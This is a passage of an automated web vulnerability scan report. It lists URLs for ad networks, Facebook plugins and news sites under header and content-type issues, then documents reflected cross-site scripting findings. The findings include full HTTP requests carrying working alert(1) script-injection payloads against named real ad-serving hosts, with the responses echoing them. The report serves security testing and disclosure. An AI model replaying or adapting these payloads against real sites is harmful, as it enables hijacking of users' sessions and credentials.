14.31. http://kellwood.com/brand_images/koret.jpg

14.32. http://kellwood.com/brand_images/logo_adam.png

14.33. http://kellwood.com/brand_images/logo_babyphat.png

14.34. http://kellwood.com/brand_images/logo_blkdnm.png

14.35. http://kellwood.com/brand_images/logo_briggs.png

14.36. http://kellwood.com/brand_images/logo_davidmeister.png

14.37. http://kellwood.com/brand_images/logo_democracy.png

14.38. http://kellwood.com/brand_images/logo_jax.png

14.39. http://kellwood.com/brand_images/logo_jolt.png

14.40. http://kellwood.com/brand_images/logo_koret.png

14.41. http://kellwood.com/brand_images/logo_mymichelle.png

14.42. http://kellwood.com/brand_images/logo_phatfarm.png

14.43. http://kellwood.com/brand_images/logo_rebeccataylor.png

14.44. http://kellwood.com/brand_images/logo_rewind.png

14.45. http://kellwood.com/brand_images/logo_sagharbor.png

14.46. http://kellwood.com/brand_images/logo_sangria.png

14.47. http://kellwood.com/brand_images/logo_vince.png

14.48. http://kellwood.com/brand_images/logo_xoxo.png

14.49. http://kellwood.com/brand_images/mymichelle.jpg

14.50. http://kellwood.com/brand_images/phatfarm.jpg

14.51. http://kellwood.com/brand_images/rebeccataylor.jpg

14.52. http://kellwood.com/brand_images/rewind.jpg

14.53. http://kellwood.com/brand_images/sagharbor.jpg

14.54. http://kellwood.com/brand_images/sangria.jpg

14.55. http://kellwood.com/brand_images/vince.jpg

14.56. http://kellwood.com/brand_images/xoxo.jpg

14.57. http://kellwood.com/brand_text/text_adam.png

14.58. http://kellwood.com/brand_text/text_babyphat.png

14.59. http://kellwood.com/brand_text/text_blkdnm.png

14.60. http://kellwood.com/brand_text/text_briggs.png

14.61. http://kellwood.com/brand_text/text_davidmeister.png

14.62. http://kellwood.com/brand_text/text_democracy.png

14.63. http://kellwood.com/brand_text/text_jax.png

14.64. http://kellwood.com/brand_text/text_jolt.png

14.65. http://kellwood.com/brand_text/text_koret.png

14.66. http://kellwood.com/brand_text/text_mymichelle.png

14.67. http://kellwood.com/brand_text/text_phatfarm.png

14.68. http://kellwood.com/brand_text/text_rebeccataylor.png

14.69. http://kellwood.com/brand_text/text_rewind.png

14.70. http://kellwood.com/brand_text/text_sagharbor.png

14.71. http://kellwood.com/brand_text/text_sangria.png

14.72. http://kellwood.com/brand_text/text_vince.png

14.73. http://kellwood.com/brand_text/text_xoxo.png

14.74. http://kellwood.com/favicon.ico

14.75. http://kellwood.com/homeImageRoll.swf

14.76. http://kellwood.com/home_images/home1.jpg

14.77. http://kellwood.com/home_images/home2.jpg

14.78. http://kellwood.com/home_images/home5.jpg

14.79. http://kellwood.com/home_images/home6.jpg

14.80. http://kellwood.com/home_images/home7.jpg

14.81. http://kellwood.com/kwd_brands.swf

14.82. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

14.83. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

14.84. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

14.85. http://www.facebook.com/connect/connect.php

14.86. http://www.facebook.com/connect/connect.php

14.87. http://www.facebook.com/connect/connect.php

14.88. http://www.facebook.com/connect/connect.php

14.89. http://www.facebook.com/connect/connect.php

14.90. http://www.facebook.com/connect/connect.php

14.91. http://www.facebook.com/connect/connect.php

14.92. http://www.facebook.com/connect/connect.php

14.93. http://www.facebook.com/connect/connect.php

14.94. http://www.facebook.com/connect/connect.php

14.95. http://www.facebook.com/connect/connect.php

14.96. http://www.facebook.com/connect/connect.php

14.97. http://www.facebook.com/connect/connect.php

14.98. http://www.facebook.com/extern/login_status.php

14.99. http://www.facebook.com/plugins/activity.php

14.100. http://www.facebook.com/plugins/activity.php

14.101. http://www.facebook.com/plugins/activity.php

14.102. http://www.facebook.com/plugins/activity.php

14.103. http://www.facebook.com/plugins/activity.php

14.104. http://www.facebook.com/plugins/activity.php

14.105. http://www.facebook.com/plugins/activity.php

14.106. http://www.facebook.com/plugins/activity.php

14.107. http://www.facebook.com/plugins/activity.php

14.108. http://www.facebook.com/plugins/activity.php

14.109. http://www.facebook.com/plugins/like.php

14.110. http://www.facebook.com/plugins/like.php

14.111. http://www.facebook.com/plugins/like.php

14.112. http://www.facebook.com/plugins/like.php

14.113. http://www.facebook.com/plugins/like.php

14.114. http://www.facebook.com/plugins/like.php

14.115. http://www.facebook.com/plugins/like.php

14.116. http://www.facebook.com/plugins/likebox.php

14.117. http://www.facebook.com/plugins/likebox.php

14.118. http://www.facebook.com/plugins/likebox.php

14.119. http://www.facebook.com/plugins/likebox.php

14.120. http://www.facebook.com/plugins/likebox.php

14.121. http://www.facebook.com/plugins/recommendations.php

14.122. http://www.facebook.com/plugins/recommendations.php

14.123. http://www.facebook.com/plugins/recommendations.php

14.124. http://www.facebook.com/plugins/recommendations.php

14.125. http://www.facebook.com/plugins/recommendations.php

14.126. http://www.facebook.com/plugins/recommendations.php

14.127. http://www.facebook.com/plugins/recommendations.php

14.128. http://www.facebook.com/plugins/recommendations.php

14.129. http://www.facebook.com/plugins/recommendations.php

14.130. http://www.facebook.com/plugins/recommendations.php

14.131. http://www.facebook.com/plugins/recommendations.php

14.132. http://www.facebook.com/plugins/recommendations.php

14.133. http://www.facebook.com/plugins/recommendations.php

14.134. http://www.foxnews.com/static/all/js/head.js

14.135. http://www.foxnews.com/static/fn2/ws/politics/js/simple_include/elections/elections.js

14.136. http://www.motivitycms.com/favicon.ico

14.137. http://www.motivitycms.com/images/150w.gif

14.138. http://www.motivitycms.com/images/ae-before-after.gif

14.139. http://www.motivitycms.com/images/arrow-bullet.gif

14.140. http://www.motivitycms.com/images/blue-gradient.gif

14.141. http://www.motivitycms.com/images/bookmark-icon.gif

14.142. http://www.motivitycms.com/images/bottom-footer-bg.jpg

14.143. http://www.motivitycms.com/images/bullet-blue.gif

14.144. http://www.motivitycms.com/images/careers-footer-nav.jpg

14.145. http://www.motivitycms.com/images/commerceEnabled.png

14.146. http://www.motivitycms.com/images/contact-footer-nav.jpg

14.147. http://www.motivitycms.com/images/customerBrocade.gif

14.148. http://www.motivitycms.com/images/customerSysco.gif

14.149. http://www.motivitycms.com/images/email-icon.gif

14.150. http://www.motivitycms.com/images/footer-bg.jpg

14.151. http://www.motivitycms.com/images/form-bg.jpg

14.152. http://www.motivitycms.com/images/go-bullet.jpg

14.153. http://www.motivitycms.com/images/google-web-optimzer.gif

14.154. http://www.motivitycms.com/images/iconDollarSign.gif

14.155. http://www.motivitycms.com/images/insidebkgrd.gif

14.156. http://www.motivitycms.com/images/link-list-bottom-border.jpg

14.157. http://www.motivitycms.com/images/link-list-top.jpg

14.158. http://www.motivitycms.com/images/logo-div-bg.jpg

14.159. http://www.motivitycms.com/images/natureair-screenshot.gif

14.160. http://www.motivitycms.com/images/nav/about.gif

14.161. http://www.motivitycms.com/images/nav/aboutOver.gif

14.162. http://www.motivitycms.com/images/nav/customers.gif

14.163. http://www.motivitycms.com/images/nav/customersOver.gif

14.164. http://www.motivitycms.com/images/nav/home.gif

14.165. http://www.motivitycms.com/images/nav/marketing-platform.gif

14.166. http://www.motivitycms.com/images/nav/marketing-platformOver.gif

14.167. http://www.motivitycms.com/images/nav/partners.gif

14.168. http://www.motivitycms.com/images/nav/partnersOver.gif

14.169. http://www.motivitycms.com/images/nav/services.gif

14.170. http://www.motivitycms.com/images/please-contact-me.gif

14.171. http://www.motivitycms.com/images/print-icon.gif

14.172. http://www.motivitycms.com/images/rightcolumn-shadow.gif

14.173. http://www.motivitycms.com/images/sign-up-btn.gif

14.174. http://www.motivitycms.com/images/support-footer-nav.jpg

15. Robots.txt file

15.1. http://appointron.com/

15.2. http://feeds.bbci.co.uk/news/rss.xml

15.3. http://fls.doubleclick.net/activityi

15.4. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1063327355/

15.5. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

15.6. http://segment-pixel.invitemedia.com/pixel

15.7. http://www.google-analytics.com/__utm.gif

15.8. https://www.google.com/accounts/ServiceLogin

15.9. http://www.googleadservices.com/pagead/conversion/992540712/

16. HTML does not specify charset

16.1. http://ad.adsrvr.org/container/7j9i29e.1.html

16.2. http://ad.doubleclick.net/adi/fnc/root/stocksearch

16.3. http://ad.doubleclick.net/adi/wn.loc.wcax/community

16.4. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

16.5. http://ad.doubleclick.net/adi/wn.loc.wcax/mostpopular

16.6. http://ad.doubleclick.net/adi/wn.loc.wcax/news

16.7. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-national

16.8. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-state

16.9. http://ad.doubleclick.net/adi/wn.loc.wcax/political

16.10. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1

16.11. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

16.12. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

16.13. http://ad.yieldmanager.com/iframe3

16.14. http://ads.pointroll.com/PortalServe/

16.15. http://adserver.veruta.com/cookiematch.fcgi

16.16. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

16.17. http://amch.questionmarket.com/adscgen/st.php

16.18. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.19. http://cplads.appspot.com/creatives/aio_300_250/GoogleForm_dp.html

16.20. http://fls.doubleclick.net/activityi

16.21. http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html

16.22. http://hostedusa3.whoson.com/include.js

16.23. http://js.adsonar.com/js/pass.html

16.24. http://kellwood.com/homeImageFiles.asp

16.25. http://now.eloqua.com/visitor/v200/svrGP.aspx

16.26. http://odb.outbrain.com/utils/ping.html

16.27. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

16.28. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros

16.29. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics

16.30. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros

16.31. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros

16.32. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros

16.33. http://tracking.placelocal.com/

16.34. http://w55c.net/ct/cms-2-frame.html

16.35. http://www.rss-info.com/rss2.php

16.36. http://www.wptz.com/esi/postcaching/getKAtoken.esi

17. Content type incorrectly stated

17.1. http://a0.twimg.com/profile_images/313260532/thurston_normal.gif

17.2. http://a1.interclick.com/getInPageJS.aspx

17.3. http://a1.interclick.com/getInPageJSProcess.aspx

17.4. http://a2.twimg.com/profile_images/1133407227/ugh_normal.jpg

17.5. http://a2.twimg.com/profile_images/313254997/carlson_normal.gif

17.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

17.7. http://adadvisor.net/adscores/g.js

17.8. http://admeld.lucidmedia.com/clicksense/admeld/match

17.9. http://ads.adap.tv/beacons

17.10. http://adserver.veruta.com/cookiematch.fcgi

17.11. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

17.12. http://amch.questionmarket.com/adscgen/st.php

17.13. http://api.kickapps.com/rest/comments/62976

17.14. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

17.15. http://bh.contextweb.com/bh/sync/admeld

17.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.17. http://cdn.taboolasyndication.com/libtrc/hearst-wptz/rbox.en.4-6-12-44788.json

17.18. http://cdnserve.a-widget.com/service/getWidget2.kickAction

17.19. http://clientapps.kickapps.com/hearst/articleTitles.php

17.20. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php

17.21. http://clientapps.kickapps.com/hearst/comments/include.php

17.22. http://clientapps.kickapps.com/hearst/comments/start.php

17.23. http://hostedusa3.whoson.com/include.js

17.24. http://javadl-esd.sun.com/update/AU/map-2.0.3.1.xml

17.25. http://kellwood.com/homeImageFiles.asp

17.26. http://nexus.ensighten.com/IB/serverComponent.php

17.27. http://now.eloqua.com/visitor/v200/svrGP.aspx

17.28. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif

17.29. http://server.iad.liveperson.net/hcp/html/mTag.js

17.30. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

17.31. http://tracking.placelocal.com/

17.32. http://trc.taboolasyndication.com/hearst-wptz/trc/2/json

17.33. http://www.acquisio.com/wp-content/themes/acquisio/images/favicon.ico

17.34. http://www.clickability.com/templates/Corp_Scripts_Template.js

17.35. http://www.clickability.com/templates/swfobject.js

17.36. http://www.foxnews.com/authentication/logout/submit

17.37. http://www.foxnews.com/favicon.ico

17.38. http://www.foxnews.com/ucat/images/291976_Jennifer121.jpg

17.39. http://www.foxnews.com/ucat/images/292526_partridges121.jpg

17.40. http://www.foxnews.com/ucat/images/292528_sucker-punch-vanessa-hudgens121.jpg

17.41. http://www.foxnews.com/weather/feed/getWeatherJsonP

17.42. http://www.internetrix.net/favicon.ico

17.43. http://www.internetrix.net/images/event_list_bg.gif

17.44. http://www.rss-info.com/rss2.php

17.45. http://www.vermontopia.com/custom/content_files/img_logo.gif

17.46. http://www.vermontopia.com/custom/content_files/noimage.gif

17.47. http://www.wptz.com/_public/js/ibLast.js

17.48. http://www.wptz.com/esi/postcaching/getKAtoken.esi

18. Content type is not specified

18.1. http://ad.yieldmanager.com/st

18.2. http://ads.bluelithium.com/st

18.3. http://ads.pointroll.com/PortalServe/

18.4. http://lfov.net/favicon.ico

18.5. http://lfov.net/webrecorder/g/chimera.js

18.6. http://lfov.net/webrecorder/js/listen.js

18.7. http://pcm2.map.pulsemgr.com/uds/pc

18.8. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction

19. SSL certificate



1. Cross-site scripting (reflected)  next
There are 163 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43f3d'-alert(1)-'d25126b0b26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews43f3d'-alert(1)-'d25126b0b26/tier2_031010;sz=300x250;ord=1302538878? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews43f3d'-alert(1)-'d25126b0b26/tier2_031010;sz=300x250;net=cm;ord=1302538878;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.2. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 526b1'-alert(1)-'91a29197829 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010526b1'-alert(1)-'91a29197829;sz=300x250;ord=1302538878? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010526b1'-alert(1)-'91a29197829;sz=300x250;net=cm;ord=1302538878;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.3. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45a4e'-alert(1)-'a7de91708c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010;sz=300x250;ord=1302538878?&45a4e'-alert(1)-'a7de91708c1=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010;sz=300x250;net=cm;ord=1302538878?&45a4e'-alert(1)-'a7de91708c1=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc880'-alert(1)-'d086b252dc0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010;sz=300x250;ord=1302538878?cc880'-alert(1)-'d086b252dc0 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010;sz=300x250;net=cm;ord=1302538878?cc880'-alert(1)-'d086b252dc0;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.rfihub.com/sed [pa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88e8f'><script>alert(1)</script>2f874ec50da was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre35252550824788e8f'><script>alert(1)</script>2f874ec50da&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com
